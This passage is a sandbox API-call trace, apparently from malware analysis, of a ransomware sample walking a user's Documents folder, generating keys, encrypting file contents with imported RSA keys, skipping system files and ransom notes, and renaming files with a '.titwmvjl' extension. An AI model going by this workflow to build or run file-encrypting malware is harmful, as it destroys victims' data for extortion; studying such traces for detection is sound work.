dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f130*=0x100) returned 1 [0090.846] GetLastError () returned 0x0 [0090.846] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.847] CryptDestroyKey (hKey=0x5036f8) returned 1 [0090.847] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.847] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.847] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0090.847] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0090.847] ReadFile (in: hFile=0x2b4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f1dc*=0x108fb, lpOverlapped=0x0) returned 1 [0090.857] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffef705, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.857] WriteFile (in: hFile=0x2b4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x108fb, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f1c0*=0x108fb, lpOverlapped=0x0) returned 1 [0090.860] WriteFile (in: hFile=0x2b4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0090.861] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.864] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.865] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.865] CloseHandle (hObject=0x2b4) returned 1 [0090.866] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\VST Y0uLtO6PgOIQ1J0Z.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\vst y0ulto6pgoiq1j0z.rtf"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\VST Y0uLtO6PgOIQ1J0Z.rtf.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\vst y0ulto6pgoiq1j0z.rtf.titwmvjl"), dwFlags=0x1) returned 1 [0090.866] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.866] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0090.866] lstrcmpW (lpString1="vW_oXWtlIV.ots", lpString2=".") returned 1 [0090.866] lstrcmpW (lpString1="vW_oXWtlIV.ots", lpString2="..") returned 1 [0090.866] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\", lpString2="vW_oXWtlIV.ots" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\vW_oXWtlIV.ots") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\vW_oXWtlIV.ots" [0090.866] lstrlenW (lpString=".titwmvjl") returned 9 [0090.867] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\vW_oXWtlIV.ots") returned 57 [0090.867] VirtualAlloc (lpAddress=0x0, dwSize=0xb2, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0090.867] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\vW_oXWtlIV.ots.titwmvjl") returned 66 [0090.867] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\vW_oXWtlIV.ots") returned 57 [0090.867] lstrlenW (lpString=".ots") returned 4 [0090.867] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.867] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".ots ") returned 5 [0090.867] lstrcmpiW (lpString1=".ots", lpString2=".titwmvjl") returned -1 [0090.867] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.867] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\vW_oXWtlIV.ots") returned 57 [0090.867] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\vW_oXWtlIV.ots") returned 57 [0090.867] lstrcmpiW (lpString1="vW_oXWtlIV.ots", lpString2="desktop.ini") returned 1 [0090.867] lstrcmpiW (lpString1="vW_oXWtlIV.ots", lpString2="autorun.inf") returned 1 [0090.867] lstrcmpiW (lpString1="vW_oXWtlIV.ots", lpString2="ntuser.dat") returned 1 [0090.867] lstrcmpiW (lpString1="vW_oXWtlIV.ots", lpString2="iconcache.db") returned 1 [0090.867] lstrcmpiW (lpString1="vW_oXWtlIV.ots", lpString2="bootsect.bak") returned 1 [0090.867] lstrcmpiW (lpString1="vW_oXWtlIV.ots", lpString2="boot.ini") returned 1 [0090.867] lstrcmpiW (lpString1="vW_oXWtlIV.ots", lpString2="ntuser.dat.log") returned 1 [0090.867] lstrcmpiW (lpString1="vW_oXWtlIV.ots", lpString2="thumbs.db") returned 1 [0090.867] lstrcmpiW (lpString1="vW_oXWtlIV.ots", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0090.867] lstrcmpiW (lpString1="vW_oXWtlIV.ots", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0090.867] lstrcmpiW (lpString1="vW_oXWtlIV.ots", lpString2="KRAB-DECRYPT.html") returned 1 [0090.867] lstrcmpiW (lpString1="vW_oXWtlIV.ots", lpString2="CRAB-DECRYPT.html") returned 1 [0090.867] lstrcmpiW (lpString1="vW_oXWtlIV.ots", lpString2="KRAB-DECRYPT.txt") returned 1 [0090.867] lstrcmpiW (lpString1="vW_oXWtlIV.ots", lpString2="CRAB-DECRYPT.txt") returned 1 [0090.868] lstrcmpiW (lpString1="vW_oXWtlIV.ots", lpString2="ntldr") returned 1 [0090.868] lstrcmpiW (lpString1="vW_oXWtlIV.ots", lpString2="NTDETECT.COM") returned 1 [0090.868] lstrcmpiW (lpString1="vW_oXWtlIV.ots", lpString2="Bootfont.bin") returned 1 [0090.868] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\vW_oXWtlIV.ots") returned 57 [0090.868] lstrlenW (lpString=".ots") returned 4 [0090.868] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.868] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".ots ") returned 5 [0090.868] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.868] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.868] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\vW_oXWtlIV.ots" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\vw_oxwtliv.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0090.869] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.869] ReadFile (in: hFile=0x2b4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0090.869] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.869] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.869] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0090.870] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0090.870] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0090.870] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0090.870] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0090.870] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.870] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.870] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.870] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.871] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0090.871] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0090.871] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0090.871] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0090.871] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0090.872] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.872] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.872] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.872] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.872] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0090.872] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.872] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5032f8) returned 1 [0090.872] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.873] CryptGetKeyParam (in: hKey=0x5032f8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0090.873] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.873] CryptEncrypt (in: hKey=0x5032f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f130*=0x100) returned 1 [0090.873] GetLastError () returned 0x0 [0090.873] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.873] CryptDestroyKey (hKey=0x5032f8) returned 1 [0090.873] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.873] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.873] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.874] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0090.874] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.874] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503978) returned 1 [0090.874] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.874] CryptGetKeyParam (in: hKey=0x503978, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0090.874] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.874] CryptEncrypt (in: hKey=0x503978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f130*=0x100) returned 1 [0090.875] GetLastError () returned 0x0 [0090.875] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.875] CryptDestroyKey (hKey=0x503978) returned 1 [0090.875] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.875] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.875] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0090.875] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0090.875] ReadFile (in: hFile=0x2b4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f1dc*=0x28e6, lpOverlapped=0x0) returned 1 [0090.884] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xffffd71a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.884] WriteFile (in: hFile=0x2b4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x28e6, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f1c0*=0x28e6, lpOverlapped=0x0) returned 1 [0090.885] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.885] WriteFile (in: hFile=0x2b4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0090.886] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.890] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.890] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.890] CloseHandle (hObject=0x2b4) returned 1 [0090.891] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\vW_oXWtlIV.ots" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\vw_oxwtliv.ots"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\vW_oXWtlIV.ots.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\vw_oxwtliv.ots.titwmvjl"), dwFlags=0x1) returned 1 [0090.891] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.891] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 0 [0090.892] FindClose (in: hFindFile=0x5034f8 | out: hFindFile=0x5034f8) returned 1 [0090.893] CloseHandle (hObject=0x2ac) returned 1 [0090.893] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0090.893] lstrcmpW (lpString1="aIz1pjrpDB7p-TmwYt.docx", lpString2=".") returned 1 [0090.893] lstrcmpW (lpString1="aIz1pjrpDB7p-TmwYt.docx", lpString2="..") returned 1 [0090.893] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="aIz1pjrpDB7p-TmwYt.docx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\aIz1pjrpDB7p-TmwYt.docx") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\aIz1pjrpDB7p-TmwYt.docx" [0090.893] lstrlenW (lpString=".titwmvjl") returned 9 [0090.893] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\aIz1pjrpDB7p-TmwYt.docx") returned 55 [0090.893] VirtualAlloc (lpAddress=0x0, dwSize=0xae, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0090.893] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\aIz1pjrpDB7p-TmwYt.docx.titwmvjl") returned 64 [0090.893] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\aIz1pjrpDB7p-TmwYt.docx") returned 55 [0090.893] lstrlenW (lpString=".docx") returned 5 [0090.893] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.893] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".docx ") returned 6 [0090.893] lstrcmpiW (lpString1=".docx", lpString2=".titwmvjl") returned -1 [0090.893] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.894] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\aIz1pjrpDB7p-TmwYt.docx") returned 55 [0090.894] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\aIz1pjrpDB7p-TmwYt.docx") returned 55 [0090.894] lstrcmpiW (lpString1="aIz1pjrpDB7p-TmwYt.docx", lpString2="desktop.ini") returned -1 [0090.894] lstrcmpiW (lpString1="aIz1pjrpDB7p-TmwYt.docx", lpString2="autorun.inf") returned -1 [0090.894] lstrcmpiW (lpString1="aIz1pjrpDB7p-TmwYt.docx", lpString2="ntuser.dat") returned -1 [0090.894] lstrcmpiW (lpString1="aIz1pjrpDB7p-TmwYt.docx", lpString2="iconcache.db") returned -1 [0090.894] lstrcmpiW (lpString1="aIz1pjrpDB7p-TmwYt.docx", lpString2="bootsect.bak") returned -1 [0090.894] lstrcmpiW (lpString1="aIz1pjrpDB7p-TmwYt.docx", lpString2="boot.ini") returned -1 [0090.894] lstrcmpiW (lpString1="aIz1pjrpDB7p-TmwYt.docx", lpString2="ntuser.dat.log") returned -1 [0090.894] lstrcmpiW (lpString1="aIz1pjrpDB7p-TmwYt.docx", lpString2="thumbs.db") returned -1 [0090.894] lstrcmpiW (lpString1="aIz1pjrpDB7p-TmwYt.docx", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0090.894] lstrcmpiW (lpString1="aIz1pjrpDB7p-TmwYt.docx", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0090.894] lstrcmpiW (lpString1="aIz1pjrpDB7p-TmwYt.docx", lpString2="KRAB-DECRYPT.html") returned -1 [0090.894] lstrcmpiW (lpString1="aIz1pjrpDB7p-TmwYt.docx", lpString2="CRAB-DECRYPT.html") returned -1 [0090.894] lstrcmpiW (lpString1="aIz1pjrpDB7p-TmwYt.docx", lpString2="KRAB-DECRYPT.txt") returned -1 [0090.894] lstrcmpiW (lpString1="aIz1pjrpDB7p-TmwYt.docx", lpString2="CRAB-DECRYPT.txt") returned -1 [0090.894] lstrcmpiW (lpString1="aIz1pjrpDB7p-TmwYt.docx", lpString2="ntldr") returned -1 [0090.894] lstrcmpiW (lpString1="aIz1pjrpDB7p-TmwYt.docx", lpString2="NTDETECT.COM") returned -1 [0090.894] lstrcmpiW (lpString1="aIz1pjrpDB7p-TmwYt.docx", lpString2="Bootfont.bin") returned -1 [0090.894] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\aIz1pjrpDB7p-TmwYt.docx") returned 55 [0090.894] lstrlenW (lpString=".docx") returned 5 [0090.894] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.894] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".docx ") returned 6 [0090.894] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.894] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.894] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\aIz1pjrpDB7p-TmwYt.docx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\aiz1pjrpdb7p-tmwyt.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0090.895] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.895] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0090.896] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.896] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.896] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0090.896] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0090.896] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0090.896] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0090.896] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0090.897] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.897] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.897] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.897] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.897] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0090.897] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0090.897] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0090.898] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0090.898] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0090.898] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.898] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.898] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.898] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.898] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0090.898] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.899] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x5035b8) returned 1 [0090.899] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.899] CryptGetKeyParam (in: hKey=0x5035b8, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0090.899] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.899] CryptEncrypt (in: hKey=0x5035b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0090.899] GetLastError () returned 0x0 [0090.899] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.899] CryptDestroyKey (hKey=0x5035b8) returned 1 [0090.899] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.900] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.900] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.900] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0090.900] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.900] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503478) returned 1 [0090.900] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.900] CryptGetKeyParam (in: hKey=0x503478, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0090.900] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.901] CryptEncrypt (in: hKey=0x503478, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0090.901] GetLastError () returned 0x0 [0090.901] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.901] CryptDestroyKey (hKey=0x503478) returned 1 [0090.901] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.901] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.901] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0090.901] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0090.902] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0x10a24, lpOverlapped=0x0) returned 1 [0090.912] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffef5dc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.912] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x10a24, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0x10a24, lpOverlapped=0x0) returned 1 [0090.914] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0090.915] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.919] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.919] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.920] CloseHandle (hObject=0x2ac) returned 1 [0090.920] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\aIz1pjrpDB7p-TmwYt.docx" (normalized: 